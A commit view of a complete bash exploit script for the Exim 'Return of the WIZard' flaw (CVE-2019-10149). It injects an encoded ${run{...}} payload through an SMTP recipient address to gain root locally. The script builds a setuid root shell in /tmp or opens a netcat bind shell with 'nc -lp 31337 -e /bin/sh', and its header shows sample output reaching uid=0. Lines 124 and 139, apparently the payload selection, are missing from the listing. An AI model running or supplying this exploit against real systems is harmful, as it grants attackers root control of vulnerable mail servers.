Projects STRLCPY 0xdea-exploits Commits 2439362c
  • ■ ■ ■ ■ ■ ■
     1 +#!/bin/bash
     2 + 
     3 +#
     4 +# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
     5 +# Copyright (c) 2019 Marco Ivaldi <[email protected]>
     6 +#
     7 +# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
     8 +# Improper validation of recipient address in deliver_message()
     9 +# function in /src/deliver.c may lead to remote command execution.
     10 +# (CVE-2019-10149)
     11 +#
     12 +# This is a local privilege escalation exploit for "The Return
     13 +# of the WIZard" vulnerability reported by the Qualys Security
     14 +# Advisory team.
     15 +#
     16 +# Credits:
     17 +# Qualys Security Advisory team (kudos for your amazing research!)
     18 +# Dennis 'dhn' Herrmann (/dev/tcp technique)
     19 +#
     20 +# Usage (setuid method):
     21 +# $ id
     22 +# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
     23 +# $ ./raptor_exim_wiz -m setuid
     24 +# Preparing setuid shell helper...
     25 +# Delivering setuid payload...
     26 +# [...]
     27 +# Waiting 5 seconds...
     28 +# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
     29 +# # id
     30 +# uid=0(root) gid=0(root) groups=0(root)
     31 +#
     32 +# Usage (netcat method):
     33 +# $ id
     34 +# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
     35 +# $ ./raptor_exim_wiz -m netcat
     36 +# Delivering netcat payload...
     37 +# Waiting 5 seconds...
     38 +# localhost [] 31337 (?) open
     39 +# id
     40 +# uid=0(root) gid=0(root) groups=0(root)
     41 +#
     42 +# Vulnerable platforms:
     43 +# Exim 4.87 - 4.91
     44 +#
     45 +# Tested against:
     46 +# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
     47 +#
     48 + 
     49 +METHOD="setuid" # default method
     50 +PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
     51 +PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
     52 + 
     53 +# usage instructions
     54 +function usage()
     55 +{
     56 + echo "$0 [-m METHOD]"
     57 + echo
     58 + echo "-m setuid : use the setuid payload (default)"
     59 + echo "-m netcat : use the netcat payload"
     60 + echo
     61 + exit 1
     62 +}
     63 + 
     64 +# payload delivery
     65 +function exploit()
     66 +{
     67 + # connect to localhost:25
     68 + exec 3<>/dev/tcp/localhost/25
     69 + 
     70 + # deliver the payload
     71 + read -u 3 && echo $REPLY
     72 + echo "helo localhost" >&3
     73 + read -u 3 && echo $REPLY
     74 + echo "mail from:<>" >&3
     75 + read -u 3 && echo $REPLY
     76 + echo "rcpt to:<$PAYLOAD>" >&3
     77 + read -u 3 && echo $REPLY
     78 + echo "data" >&3
     79 + read -u 3 && echo $REPLY
     80 + for i in {1..31}
     81 + do
     82 + echo "Received: $i" >&3
     83 + done
     84 + echo "." >&3
     85 + read -u 3 && echo $REPLY
     86 + echo "quit" >&3
     87 + read -u 3 && echo $REPLY
     88 +}
     89 + 
     90 +# print banner
     91 +echo
     92 +echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
     93 +echo 'Copyright (c) 2019 Marco Ivaldi <[email protected]>'
     94 +echo
     95 + 
     96 +# parse command line
     97 +while [ ! -z "$1" ]; do
     98 + case $1 in
     99 + -m) shift; METHOD="$1"; shift;;
     100 + * ) usage
     101 + ;;
     102 + esac
     103 +done
     104 +if [ -z $METHOD ]; then
     105 + usage
     106 +fi
     107 + 
     108 +# setuid method
     109 +if [ $METHOD = "setuid" ]; then
     110 + 
     111 + # prepare a setuid shell helper to circumvent bash checks
     112 + echo "Preparing setuid shell helper..."
     113 + echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
     114 + gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
     115 + if [ $? -ne 0 ]; then
     116 + echo "Problems compiling setuid shell helper, check your gcc."
     117 + echo "Falling back to the /bin/sh method."
     118 + cp /bin/sh /tmp/pwned
     119 + fi
     120 + echo
     121 + 
     122 + # select and deliver the payload
     123 + echo "Delivering $METHOD payload..."
     125 + exploit
     126 + echo
     127 + 
     128 + # wait for the magic to happen and spawn our shell
     129 + echo "Waiting 5 seconds..."
     130 + sleep 5
     131 + ls -l /tmp/pwned
     132 + /tmp/pwned
     133 + 
     134 +# netcat method
     135 +elif [ $METHOD = "netcat" ]; then
     136 + 
     137 + # select and deliver the payload
     138 + echo "Delivering $METHOD payload..."
     140 + exploit
     141 + echo
     142 + 
     143 + # wait for the magic to happen and spawn our shell
     144 + echo "Waiting 5 seconds..."
     145 + sleep 5
     146 + nc -v 31337
     147 + 
     148 +# print help
     149 +else
     150 + usage
     151 +fi
     152 + 
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